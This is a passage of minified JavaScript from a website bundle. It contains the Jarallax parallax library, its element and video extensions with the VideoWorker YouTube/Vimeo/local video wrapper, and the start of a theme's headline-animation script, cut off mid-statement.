t,e,i,n=this,o={position:"absolute",top:0,left:0,width:"100%",height:"100%",overflow:"hidden"},s={pointerEvents:"none",transformStyle:"preserve-3d",backfaceVisibility:"hidden",willChange:"transform,opacity"};n.options.keepImg||((t=n.$item.getAttribute("style"))&&n.$item.setAttribute("data-jarallax-original-styles",t),!n.image.useImgTag||(e=n.image.$item.getAttribute("style"))&&n.image.$item.setAttribute("data-jarallax-original-styles",e)),"static"===n.css(n.$item,"position")&&n.css(n.$item,{position:"relative"}),"auto"===n.css(n.$item,"z-index")&&n.css(n.$item,{zIndex:0}),n.image.$container=document.createElement("div"),n.css(n.image.$container,o),n.css(n.image.$container,{"z-index":n.options.zIndex}),h&&n.css(n.image.$container,{opacity:.9999}),n.image.$container.setAttribute("id","jarallax-container-".concat(n.instanceID)),n.$item.appendChild(n.image.$container),n.image.useImgTag?s=n.extend({"object-fit":n.options.imgSize,"object-position":n.options.imgPosition,"font-family":"object-fit: ".concat(n.options.imgSize,"; object-position: ").concat(n.options.imgPosition,";"),"max-width":"none"},o,s):(n.image.$item=document.createElement("div"),n.image.src&&(s=n.extend({"background-position":n.options.imgPosition,"background-size":n.options.imgSize,"background-repeat":n.options.imgRepeat,"background-image":n.image.bgImage||'url("'.concat(n.image.src,'")')},o,s))),"opacity"!==n.options.type&&"scale"!==n.options.type&&"scale-opacity"!==n.options.type&&1!==n.options.speed||(n.image.position="absolute"),"fixed"===n.image.position&&(i=function(t){for(var e=[];null!==t.parentElement;)1===(t=t.parentElement).nodeType&&e.push(t);return e}(n.$item).filter(function(t){var e=a.window.getComputedStyle(t),i=e["-webkit-transform"]||e["-moz-transform"]||e.transform;return i&&"none"!==i||/(auto|scroll)/.test(e.overflow+e["overflow-y"]+e["overflow-x"])}),n.image.position=i.length?"absolute":"fixed"),s.position=n.image.position,n.css(n.image.$item,s),n.image.$container.appendChild(n.image.$item),n.onResize(),n.onScroll(!0),n.options.onInit&&n.options.onInit.call(n),"none"!==n.css(n.$item,"background-image")&&n.css(n.$item,{"background-image":"none"}),n.addToParallaxList()}},{key:"addToParallaxList",value:function(){g.push({instance:this}),1===g.length&&a.window.requestAnimationFrame(v)}},{key:"removeFromParallaxList",value:function(){var t=this;g.forEach(function(e,i){e.instance.instanceID===t.instanceID&&g.splice(i,1)})}},{key:"destroy",value:function(){var t=this;t.removeFromParallaxList();var e,i=t.$item.getAttribute("data-jarallax-original-styles");t.$item.removeAttribute("data-jarallax-original-styles"),i?t.$item.setAttribute("style",i):t.$item.removeAttribute("style"),t.image.useImgTag&&(e=t.image.$item.getAttribute("data-jarallax-original-styles"),t.image.$item.removeAttribute("data-jarallax-original-styles"),e?t.image.$item.setAttribute("style",i):t.image.$item.removeAttribute("style"),t.image.$itemParent&&t.image.$itemParent.appendChild(t.image.$item)),t.$clipStyles&&t.$clipStyles.parentNode.removeChild(t.$clipStyles),t.image.$container&&t.image.$container.parentNode.removeChild(t.image.$container),t.options.onDestroy&&t.options.onDestroy.call(t),delete t.$item.jarallax}},{key:"clipContainer",value:function(){var t,e,i,n,o;"fixed"===this.image.position&&(i=(e=(t=this).image.$container.getBoundingClientRect()).width,n=e.height,t.$clipStyles||(t.$clipStyles=document.createElement("style"),t.$clipStyles.setAttribute("type","text/css"),t.$clipStyles.setAttribute("id","jarallax-clip-".concat(t.instanceID)),(document.head||document.getElementsByTagName("head")[0]).appendChild(t.$clipStyles)),o="#jarallax-container-".concat(t.instanceID," {\n clip: rect(0 ").concat(i,"px ").concat(n,"px 0);\n clip: rect(0, ").concat(i,"px, ").concat(n,"px, 0);\n -webkit-clip-path: polygon(0 0, 100% 0, 100% 100%, 0 100%);\n clip-path: polygon(0 0, 100% 0, 100% 100%, 0 100%);\n }"),t.$clipStyles.styleSheet?t.$clipStyles.styleSheet.cssText=o:t.$clipStyles.innerHTML=o)}},{key:"coverImage",value:function(){var t,e=this,i=e.image.$container.getBoundingClientRect(),n=i.height,o=e.options.speed,a="scroll"===e.options.type||"scroll-opacity"===e.options.type,s=0,r=n;return a&&(o<0?(s=o*Math.max(n,p),p<n&&(s-=o*(n-p))):s=o*(n+p),1<o?r=Math.abs(s-p):o<0?r=s/o+Math.abs(s):r+=(p-n)*(1-o),s/=2),e.parallaxScrollDistance=s,t=a?(p-r)/2:(n-r)/2,e.css(e.image.$item,{height:"".concat(r,"px"),marginTop:"".concat(t,"px"),left:"fixed"===e.image.position?"".concat(i.left,"px"):"0",width:"".concat(i.width,"px")}),e.options.onCoverImage&&e.options.onCoverImage.call(e),{image:{height:r,marginTop:t},container:i}}},{key:"isVisible",value:function(){return this.isElementInViewport||!1}},{key:"onScroll",value:function(t){var e,i,n,o,s,r,l,d,c,u,h=this,f=h.$item.getBoundingClientRect(),m=f.top,y=f.height,g={},v=f;h.options.elementInViewport&&(v=h.options.elementInViewport.getBoundingClientRect()),h.isElementInViewport=0<=v.bottom&&0<=v.right&&v.top<=p&&v.left<=a.window.innerWidth,(t||h.isElementInViewport)&&(e=Math.max(0,m),i=Math.max(0,y+m),n=Math.max(0,-m),o=Math.max(0,m+y-p),s=Math.max(0,y-(m+y-p)),r=Math.max(0,-m+p-y),l=1-(p-m)/(p+y)*2,d=1,y<p?d=1-(n||o)/y:i<=p?d=i/p:s<=p&&(d=s/p),"opacity"!==h.options.type&&"scale-opacity"!==h.options.type&&"scroll-opacity"!==h.options.type||(g.transform="translate3d(0,0,0)",g.opacity=d),"scale"!==h.options.type&&"scale-opacity"!==h.options.type||(c=1,h.options.speed<0?c-=h.options.speed*d:c+=h.options.speed*(1-d),g.transform="scale(".concat(c,") translate3d(0,0,0)")),"scroll"!==h.options.type&&"scroll-opacity"!==h.options.type||(u=h.parallaxScrollDistance*l,"absolute"===h.image.position&&(u-=m),g.transform="translate3d(0,".concat(u,"px,0)")),h.css(h.image.$item,g),h.options.onScroll&&h.options.onScroll.call(h,{section:f,beforeTop:e,beforeTopEnd:i,afterTop:n,beforeBottom:o,beforeBottomEnd:s,afterBottom:r,visiblePercent:d,fromViewportCenter:l}))}},{key:"onResize",value:function(){this.coverImage(),this.clipContainer()}}])&&d(e.prototype,i),t}();b.constructor=w,e.default=b}]),function(t){var e={};function i(n){if(e[n])return e[n].exports;var o=e[n]={i:n,l:!1,exports:{}};return t[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}i.m=t,i.c=e,i.d=function(t,e,n){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},i.t=function(t,e){if(1&e&&(t=i(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)i.d(n,o,function(e){return t[e]}.bind(null,o));return n},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},i.p="",i(i.s=0)}([function(t,e,i){t.exports=i(1)},function(t,e,i){"use strict";i.r(e);var n=i(2),o=i.n(n),a=i(3),s=i.n(a),r=i(5);Object(r.default)(),o()(function(){void 0!==s.a.jarallax&&s.a.jarallax(document.querySelectorAll("[data-jarallax-element]"))})},function(t,e){t.exports=function(t){"complete"===document.readyState||"interactive"===document.readyState?t.call():document.attachEvent?document.attachEvent("onreadystatechange",function(){"interactive"===document.readyState&&t.call()}):document.addEventListener&&document.addEventListener("DOMContentLoaded",t)}},function(t,e,i){(function(e){var i="undefined"!=typeof window?window:void 0!==e?e:"undefined"!=typeof self?self:{};t.exports=i}).call(this,i(4))},function(t,e){function i(t){return(i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var n=function(){return this}();try{n=n||new Function("return this")()}catch(t){"object"===("undefined"==typeof window?"undefined":i(window))&&(n=window)}t.exports=n},function(t,e,i){"use strict";i.r(e),i.d(e,"default",function(){return a});var n=i(3),o=i.n(n);function a(){var t,e=0<arguments.length&&void 0!==arguments[0]?arguments[0]:o.a.jarallax;void 0!==e&&(t=e.constructor,["initImg","canInitParallax","init","destroy","clipContainer","coverImage","isVisible","onScroll","onResize"].forEach(function(e){var i=t.prototype[e];t.prototype[e]=function(){var t=this;"initImg"===e&&null!==t.$item.getAttribute("data-jarallax-element")&&(t.options.type="element",t.pureOptions.speed=t.$item.getAttribute("data-jarallax-element")||t.pureOptions.speed);for(var n=arguments.length,o=new Array(n),a=0;a<n;a++)o[a]=arguments[a];if("element"!==t.options.type)return i.apply(t,o);switch(t.pureOptions.threshold=t.$item.getAttribute("data-threshold")||"",e){case"init":var s=t.pureOptions.speed.split(" ");t.options.speed=t.pureOptions.speed||0,t.options.speedY=s[0]?parseFloat(s[0]):0,t.options.speedX=s[1]?parseFloat(s[1]):0;var r=t.pureOptions.threshold.split(" ");t.options.thresholdY=r[0]?parseFloat(r[0]):null,t.options.thresholdX=r[1]?parseFloat(r[1]):null,i.apply(t,o);var l=t.$item.getAttribute("data-jarallax-original-styles");return l&&t.$item.setAttribute("style",l),!0;case"onResize":var d=t.css(t.$item,"transform");t.css(t.$item,{transform:""});var c=t.$item.getBoundingClientRect();t.itemData={width:c.width,height:c.height,y:c.top+t.getWindowData().y,x:c.left},t.css(t.$item,{transform:d});break;case"onScroll":var p=t.getWindowData(),u=(p.y+p.height/2-t.itemData.y-t.itemData.height/2)/(p.height/2),h=u*t.options.speedY,f=u*t.options.speedX,m=h,y=f;null!==t.options.thresholdY&&h>t.options.thresholdY&&(m=0),null!==t.options.thresholdX&&f>t.options.thresholdX&&(y=0),t.css(t.$item,{transform:"translate3d(".concat(y,"px,").concat(m,"px,0)")});break;case"initImg":case"isVisible":case"clipContainer":case"coverImage":return!0}return i.apply(t,o)}}))}}]),function(t){var e={};function i(n){if(e[n])return e[n].exports;var o=e[n]={i:n,l:!1,exports:{}};return t[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}i.m=t,i.c=e,i.d=function(t,e,n){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},i.t=function(t,e){if(1&e&&(t=i(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)i.d(n,o,function(e){return t[e]}.bind(null,o));return n},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},i.p="",i(i.s=6)}([,,function(t,e){t.exports=function(t){"complete"===document.readyState||"interactive"===document.readyState?t.call():document.attachEvent?document.attachEvent("onreadystatechange",function(){"interactive"===document.readyState&&t.call()}):document.addEventListener&&document.addEventListener("DOMContentLoaded",t)}},function(t,e,i){(function(e){var i="undefined"!=typeof window?window:void 0!==e?e:"undefined"!=typeof self?self:{};t.exports=i}).call(this,i(4))},function(t,e){function i(t){return(i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var n=function(){return this}();try{n=n||new Function("return this")()}catch(t){"object"===("undefined"==typeof window?"undefined":i(window))&&(n=window)}t.exports=n},,function(t,e,i){t.exports=i(7)},function(t,e,i){"use strict";i.r(e);var n=i(8),o=i(3),a=i.n(o),s=i(2),r=i.n(s),l=i(9);a.a.VideoWorker=a.a.VideoWorker||n.default,Object(l.default)(),r()(function(){void 0!==a.a.jarallax&&a.a.jarallax(document.querySelectorAll("[data-jarallax-video]"))})},function(t,e,i){"use strict";i.r(e),i.d(e,"default",function(){return m});var n=i(3),o=i.n(n);function a(t){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function s(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}function r(){this.doneCallbacks=[],this.failCallbacks=[]}r.prototype={execute:function(t,e){var i=t.length;for(e=Array.prototype.slice.call(e);i;)t[--i].apply(null,e)},resolve:function(){for(var t=arguments.length,e=new Array(t),i=0;i<t;i++)e[i]=arguments[i];this.execute(this.doneCallbacks,e)},reject:function(){for(var t=arguments.length,e=new Array(t),i=0;i<t;i++)e[i]=arguments[i];this.execute(this.failCallbacks,e)},done:function(t){this.doneCallbacks.push(t)},fail:function(t){this.failCallbacks.push(t)}};var l=0,d=0,c=0,p=0,u=0,h=new r,f=new r,m=function(){function t(e,i){!function(e,i){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this);var n=this;n.url=e,n.options_default={autoplay:!1,loop:!1,mute:!1,volume:100,showContols:!0,startTime:0,endTime:0},n.options=n.extend({},n.options_default,i),n.videoID=n.parseURL(e),n.videoID&&(n.ID=l,l+=1,n.loadAPI(),n.init())}var e,i;return e=t,(i=[{key:"extend",value:function(){for(var t=arguments.length,e=new Array(t),i=0;i<t;i++)e[i]=arguments[i];var n=e[0]||{};return Object.keys(e).forEach(function(t){e[t]&&Object.keys(e[t]).forEach(function(i){n[i]=e[t][i]})}),n}},{key:"parseURL",value:function(t){var e,i,n,o,a,s=!(!(e=t.match(/.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/))||11!==e[1].length)&&e[1],r=!(!(i=t.match(/https?:\/\/(?:www\.|player\.)?vimeo.com\/(?:channels\/(?:\w+\/)?|groups\/([^\/]*)\/videos\/|album\/(\d+)\/video\/|video\/|)(\d+)(?:$|\/|\?)/))||!i[3])&&i[3],l=(n=t.split(/,(?=mp4\:|webm\:|ogv\:|ogg\:)/),o={},a=0,n.forEach(function(t){var e=t.match(/^(mp4|webm|ogv|ogg)\:(.*)/);e&&e[1]&&e[2]&&(o["ogv"===e[1]?"ogg":e[1]]=e[2],a=1)}),!!a&&o);return s?(this.type="youtube",s):r?(this.type="vimeo",r):!!l&&(this.type="local",l)}},{key:"isValid",value:function(){return!!this.videoID}},{key:"on",value:function(t,e){this.userEventsList=this.userEventsList||[],(this.userEventsList[t]||(this.userEventsList[t]=[])).push(e)}},{key:"off",value:function(t,e){var i=this;this.userEventsList&&this.userEventsList[t]&&(e?this.userEventsList[t].forEach(function(n,o){n===e&&(i.userEventsList[t][o]=!1)}):delete this.userEventsList[t])}},{key:"fire",value:function(t){for(var e=this,i=arguments.length,n=new Array(1<i?i-1:0),o=1;o<i;o++)n[o-1]=arguments[o];this.userEventsList&&void 0!==this.userEventsList[t]&&this.userEventsList[t].forEach(function(t){t&&t.apply(e,n)})}},{key:"play",value:function(t){var e=this;e.player&&("youtube"===e.type&&e.player.playVideo&&(void 0!==t&&e.player.seekTo(t||0),o.a.YT.PlayerState.PLAYING!==e.player.getPlayerState()&&e.player.playVideo()),"vimeo"===e.type&&(void 0!==t&&e.player.setCurrentTime(t),e.player.getPaused().then(function(t){t&&e.player.play()})),"local"===e.type&&(void 0!==t&&(e.player.currentTime=t),e.player.paused&&e.player.play()))}},{key:"pause",value:function(){var t=this;t.player&&("youtube"===t.type&&t.player.pauseVideo&&o.a.YT.PlayerState.PLAYING===t.player.getPlayerState()&&t.player.pauseVideo(),"vimeo"===t.type&&t.player.getPaused().then(function(e){e||t.player.pause()}),"local"===t.type&&(t.player.paused||t.player.pause()))}},{key:"mute",value:function(){var t=this;t.player&&("youtube"===t.type&&t.player.mute&&t.player.mute(),"vimeo"===t.type&&t.player.setVolume&&t.player.setVolume(0),"local"===t.type&&(t.$video.muted=!0))}},{key:"unmute",value:function(){var t=this;t.player&&("youtube"===t.type&&t.player.mute&&t.player.unMute(),"vimeo"===t.type&&t.player.setVolume&&t.player.setVolume(t.options.volume),"local"===t.type&&(t.$video.muted=!1))}},{key:"setVolume",value:function(t){var e=0<arguments.length&&void 0!==t&&t,i=this;i.player&&e&&("youtube"===i.type&&i.player.setVolume&&i.player.setVolume(e),"vimeo"===i.type&&i.player.setVolume&&i.player.setVolume(e),"local"===i.type&&(i.$video.volume=e/100))}},{key:"getVolume",value:function(t){var e=this;e.player?("youtube"===e.type&&e.player.getVolume&&t(e.player.getVolume()),"vimeo"===e.type&&e.player.getVolume&&e.player.getVolume().then(function(e){t(e)}),"local"===e.type&&t(100*e.$video.volume)):t(!1)}},{key:"getMuted",value:function(t){var e=this;e.player?("youtube"===e.type&&e.player.isMuted&&t(e.player.isMuted()),"vimeo"===e.type&&e.player.getVolume&&e.player.getVolume().then(function(e){t(!!e)}),"local"===e.type&&t(e.$video.muted)):t(null)}},{key:"getImageURL",value:function(t){var e,i,n,o,a=this;a.videoImage?t(a.videoImage):("youtube"===a.type&&(e=["maxresdefault","sddefault","hqdefault","0"],i=0,(n=new Image).onload=function(){120!==(this.naturalWidth||this.width)||i===e.length-1?(a.videoImage="https://img.youtube.com/vi/".concat(a.videoID,"/").concat(e[i],".jpg"),t(a.videoImage)):(i+=1,this.src="https://img.youtube.com/vi/".concat(a.videoID,"/").concat(e[i],".jpg"))},n.src="https://img.youtube.com/vi/".concat(a.videoID,"/").concat(e[i],".jpg")),"vimeo"===a.type&&((o=new XMLHttpRequest).open("GET","https://vimeo.com/api/v2/video/".concat(a.videoID,".json"),!0),o.onreadystatechange=function(){var e;4===this.readyState&&200<=this.status&&this.status<400&&(e=JSON.parse(this.responseText),a.videoImage=e[0].thumbnail_large,t(a.videoImage))},o.send(),o=null))}},{key:"getIframe",value:function(t){this.getVideo(t)}},{key:"getVideo",value:function(t){var e=this;e.$video?t(e.$video):e.onAPIready(function(){var i,n,a,s,r,l,d,c;e.$video||((i=document.createElement("div")).style.display="none"),"youtube"===e.type&&(e.playerOptions={},e.playerOptions.videoId=e.videoID,e.playerOptions.playerVars={autohide:1,rel:0,autoplay:0,playsinline:1},e.options.showContols||(e.playerOptions.playerVars.iv_load_policy=3,e.playerOptions.playerVars.modestbranding=1,e.playerOptions.playerVars.controls=0,e.playerOptions.playerVars.showinfo=0,e.playerOptions.playerVars.disablekb=1),e.playerOptions.events={onReady:function(t){e.options.mute?t.target.mute():e.options.volume&&t.target.setVolume(e.options.volume),e.options.autoplay&&e.play(e.options.startTime),e.fire("ready",t),e.options.loop&&!e.options.endTime&&(e.options.endTime=e.player.getDuration()-.1),setInterval(function(){e.getVolume(function(i){e.options.volume!==i&&(e.options.volume=i,e.fire("volumechange",t))})},150)},onStateChange:function(t){e.options.loop&&t.data===o.a.YT.PlayerState.ENDED&&e.play(e.options.startTime),n||t.data!==o.a.YT.PlayerState.PLAYING||(n=1,e.fire("started",t)),t.data===o.a.YT.PlayerState.PLAYING&&e.fire("play",t),t.data===o.a.YT.PlayerState.PAUSED&&e.fire("pause",t),t.data===o.a.YT.PlayerState.ENDED&&e.fire("ended",t),t.data===o.a.YT.PlayerState.PLAYING?a=setInterval(function(){e.fire("timeupdate",t),e.options.endTime&&e.player.getCurrentTime()>=e.options.endTime&&(e.options.loop?e.play(e.options.startTime):e.pause())},150):clearInterval(a)},onError:function(t){e.fire("error",t)}},(s=!e.$video)&&((r=document.createElement("div")).setAttribute("id",e.playerID),i.appendChild(r),document.body.appendChild(i)),e.player=e.player||new o.a.YT.Player(e.playerID,e.playerOptions),s&&(e.$video=document.getElementById(e.playerID),e.videoWidth=parseInt(e.$video.getAttribute("width"),10)||1280,e.videoHeight=parseInt(e.$video.getAttribute("height"),10)||720)),"vimeo"===e.type&&(e.playerOptions={id:e.videoID,autopause:0,transparent:0,autoplay:e.options.autoplay?1:0,loop:e.options.loop?1:0,muted:e.options.mute?1:0},e.options.volume&&(e.playerOptions.volume=e.options.volume),e.options.showContols||(e.playerOptions.badge=0,e.playerOptions.byline=0,e.playerOptions.portrait=0,e.playerOptions.title=0,e.playerOptions.background=1),e.$video||(l="",Object.keys(e.playerOptions).forEach(function(t){""!==l&&(l+="&"),l+="".concat(t,"=").concat(encodeURIComponent(e.playerOptions[t]))}),e.$video=document.createElement("iframe"),e.$video.setAttribute("id",e.playerID),e.$video.setAttribute("src","https://player.vimeo.com/video/".concat(e.videoID,"?").concat(l)),e.$video.setAttribute("frameborder","0"),e.$video.setAttribute("mozallowfullscreen",""),e.$video.setAttribute("allowfullscreen",""),i.appendChild(e.$video),document.body.appendChild(i)),e.player=e.player||new o.a.Vimeo.Player(e.$video,e.playerOptions),e.options.startTime&&e.options.autoplay&&e.player.setCurrentTime(e.options.startTime),e.player.getVideoWidth().then(function(t){e.videoWidth=t||1280}),e.player.getVideoHeight().then(function(t){e.videoHeight=t||720}),e.player.on("timeupdate",function(t){d||(e.fire("started",t),d=1),e.fire("timeupdate",t),e.options.endTime&&e.options.endTime&&t.seconds>=e.options.endTime&&(e.options.loop?e.play(e.options.startTime):e.pause())}),e.player.on("play",function(t){e.fire("play",t),e.options.startTime&&0===t.seconds&&e.play(e.options.startTime)}),e.player.on("pause",function(t){e.fire("pause",t)}),e.player.on("ended",function(t){e.fire("ended",t)}),e.player.on("loaded",function(t){e.fire("ready",t)}),e.player.on("volumechange",function(t){e.fire("volumechange",t)}),e.player.on("error",function(t){e.fire("error",t)})),"local"===e.type&&(e.$video||(e.$video=document.createElement("video"),e.options.showContols&&(e.$video.controls=!0),e.options.mute?e.$video.muted=!0:e.$video.volume&&(e.$video.volume=e.options.volume/100),e.options.loop&&(e.$video.loop=!0),e.$video.setAttribute("playsinline",""),e.$video.setAttribute("webkit-playsinline",""),e.$video.setAttribute("id",e.playerID),i.appendChild(e.$video),document.body.appendChild(i),Object.keys(e.videoID).forEach(function(t){var i,n,o,a;i=e.$video,n=e.videoID[t],o="video/".concat(t),(a=document.createElement("source")).src=n,a.type=o,i.appendChild(a)})),e.player=e.player||e.$video,e.player.addEventListener("playing",function(t){c||e.fire("started",t),c=1}),e.player.addEventListener("timeupdate",function(t){e.fire("timeupdate",t),e.options.endTime&&e.options.endTime&&this.currentTime>=e.options.endTime&&(e.options.loop?e.play(e.options.startTime):e.pause())}),e.player.addEventListener("play",function(t){e.fire("play",t)}),e.player.addEventListener("pause",function(t){e.fire("pause",t)}),e.player.addEventListener("ended",function(t){e.fire("ended",t)}),e.player.addEventListener("loadedmetadata",function(){e.videoWidth=this.videoWidth||1280,e.videoHeight=this.videoHeight||720,e.fire("ready"),e.options.autoplay&&e.play(e.options.startTime)}),e.player.addEventListener("volumechange",function(t){e.getVolume(function(t){e.options.volume=t}),e.fire("volumechange",t)}),e.player.addEventListener("error",function(t){e.fire("error",t)})),t(e.$video)})}},{key:"init",value:function(){this.playerID="VideoWorker-".concat(this.ID)}},{key:"loadAPI",value:function(){if(!d||!c){var t,e,i="";if("youtube"!==this.type||d||(d=1,i="https://www.youtube.com/iframe_api"),"vimeo"===this.type&&!c){if(c=1,void 0!==o.a.Vimeo)return;i="https://player.vimeo.com/api/player.js"}i&&(t=document.createElement("script"),e=document.getElementsByTagName("head")[0],t.src=i,e.appendChild(t),t=e=null)}}},{key:"onAPIready",value:function(t){var e;"youtube"===this.type&&(void 0!==o.a.YT&&0!==o.a.YT.loaded||p?"object"===a(o.a.YT)&&1===o.a.YT.loaded?t():h.done(function(){t()}):(p=1,window.onYouTubeIframeAPIReady=function(){window.onYouTubeIframeAPIReady=null,h.resolve("done"),t()})),"vimeo"===this.type&&(void 0!==o.a.Vimeo||u?void 0!==o.a.Vimeo?t():f.done(function(){t()}):(u=1,e=setInterval(function(){void 0!==o.a.Vimeo&&(clearInterval(e),f.resolve("done"),t())},20))),"local"===this.type&&t()}}])&&s(e.prototype,i),t}()},function(t,e,i){"use strict";i.r(e),i.d(e,"default",function(){return s});var n=i(8),o=i(3),a=i.n(o);function s(){var t,e,i,o,s,r,l=0<arguments.length&&void 0!==arguments[0]?arguments[0]:a.a.jarallax;void 0!==l&&(t=l.constructor,e=t.prototype.onScroll,t.prototype.onScroll=function(){var t=this;e.apply(t),t.isVideoInserted||!t.video||t.options.videoLazyLoading&&!t.isElementInViewport||t.options.disableVideo()||(t.isVideoInserted=!0,t.video.getVideo(function(e){var i=e.parentNode;t.css(e,{position:t.image.position,top:"0px",left:"0px",right:"0px",bottom:"0px",width:"100%",height:"100%",maxWidth:"none",maxHeight:"none",pointerEvents:"none",transformStyle:"preserve-3d",backfaceVisibility:"hidden",willChange:"transform,opacity",margin:0,zIndex:-1}),t.$video=e,"local"===t.video.type&&(t.image.src?t.$video.setAttribute("poster",t.image.src):t.image.$item&&"IMG"===t.image.$item.tagName&&t.image.$item.src&&t.$video.setAttribute("poster",t.image.$item.src)),t.image.$container.appendChild(e),i.parentNode.removeChild(i)}))},i=t.prototype.coverImage,t.prototype.coverImage=function(){var t,e,n,o,a=this,s=i.apply(a),r=!!a.image.$item&&a.image.$item.nodeName;return s&&a.video&&r&&("IFRAME"===r||"VIDEO"===r)&&(e=(t=s.image.height)*a.image.width/a.image.height,n=(s.container.width-e)/2,o=s.image.marginTop,s.container.width>e&&(t=(e=s.container.width)*a.image.height/a.image.width,n=0,o+=(s.image.height-t)/2),"IFRAME"===r&&(t+=400,o-=200),a.css(a.$video,{width:"".concat(e,"px"),marginLeft:"".concat(n,"px"),height:"".concat(t,"px"),marginTop:"".concat(o,"px")})),s},o=t.prototype.initImg,t.prototype.initImg=function(){var t=this,e=o.apply(t);return t.options.videoSrc||(t.options.videoSrc=t.$item.getAttribute("data-jarallax-video")||null),t.options.videoSrc?(t.defaultInitImgResult=e,!0):e},s=t.prototype.canInitParallax,t.prototype.canInitParallax=function(){var t=this,e=s.apply(t);if(!t.options.videoSrc)return e;var i=new n.default(t.options.videoSrc,{autoplay:!0,loop:t.options.videoLoop,showContols:!1,startTime:t.options.videoStartTime||0,endTime:t.options.videoEndTime||0,mute:t.options.videoVolume?0:1,volume:t.options.videoVolume||0});function o(){t.image.$default_item&&(t.image.$item=t.image.$default_item,t.image.$item.style.display="block",t.coverImage(),t.clipContainer(),t.onScroll())}if(i.isValid())if(this.options.disableParallax()&&(e=!0,t.image.position="absolute",t.options.type="scroll",t.options.speed=1),e){if(i.on("ready",function(){var e;t.options.videoPlayOnlyVisible?(e=t.onScroll,t.onScroll=function(){e.apply(t),t.videoError||!t.options.videoLoop&&(t.options.videoLoop||t.videoEnded)||(t.isVisible()?i.play():i.pause())}):i.play()}),i.on("started",function(){t.image.$default_item=t.image.$item,t.image.$item=t.$video,t.image.width=t.video.videoWidth||1280,t.image.height=t.video.videoHeight||720,t.coverImage(),t.clipContainer(),t.onScroll(),t.image.$default_item&&(t.image.$default_item.style.display="none")}),i.on("ended",function(){t.videoEnded=!0,t.options.videoLoop||o()}),i.on("error",function(){t.videoError=!0,o()}),t.video=i,!t.defaultInitImgResult&&(t.image.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7","local"!==i.type))return i.getImageURL(function(e){t.image.bgImage='url("'.concat(e,'")'),t.init()}),!1}else t.defaultInitImgResult||i.getImageURL(function(e){var i=t.$item.getAttribute("style");i&&t.$item.setAttribute("data-jarallax-original-styles",i),t.css(t.$item,{"background-image":'url("'.concat(e,'")'),"background-position":"center","background-size":"cover"})});return e},r=t.prototype.destroy,t.prototype.destroy=function(){var t=this;t.image.$default_item&&(t.image.$item=t.image.$default_item,delete t.image.$default_item),r.apply(t)})}}]);var piximations=function(t){"use strict";function e(){t(".pix-sliding-headline:not(.pix-ready)").each(function(e,i){var n=t(i).text().split(" "),o=t(i).attr("data-style"),a=t(i).attr("data-class"),s="";t.each(n,function(t,e){s+=o&&""!=o?'<span class="slide-in-container"><span class="d-inline-block group-animate-in" style="'+o+'" >'+e+"</span></span> ":'<span class="slide-in-container"><span class="d-inline-block group-animate-in '+a+'" >'+e+"</span></span> "});var r=!0;if(t("body").hasClass("pix-sections-stack")&&!window.vc_iframe&&t(i).closest(".pix-slides-section").length>0&&(r=!1,!t(i).closest(".pix-slides-section").hasClass("is-sticky-active")&&t(i).closest(".site-footer2").length<1))return!1;t(i).html(s),t(i).addClass("pix-ready");new Waypoint({element:i,offset:"100%",triggerOnce:r,handler:function(){var e=200;t(i).find(".group-animate-in").each(function(i,n){setTimeout(function(){t(n).addClass("animating").addClass("slide-in-up").removeClass("group-animate-in")},e),t(n).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",function(){t(n).removeClass("animating").removeClass("slide-in-up").addClass("animated")}),e+=150}),this.destroy()}})})}var n=2500,o=3800,a=o-3e3,s=50,r=150,l=500,d=l+800,c=600,p=1500;function u(){var e,s;t(".pix-headline:not(.pix-ready).letters").find("span").each(function(){var e=t(this),n=e.text().split(""),o=e.hasClass("is-visible");for(i in n)e.parents(".rotate-2").length>0&&(n[i]="<em>"+n[i]+"</em>"),n[i]=o?'<i class="in">'+n[i]+"</i>":"<i>"+n[i]+"</i>";var a=n.join("");e.html(a).css("opacity",1)}),e=t(".pix-headline:not(.pix-ready)"),s=n,e.each(function(){var e=t(this);if(t(e).addClass("pix-ready"),e.hasClass("loading-bar")){s=o;var 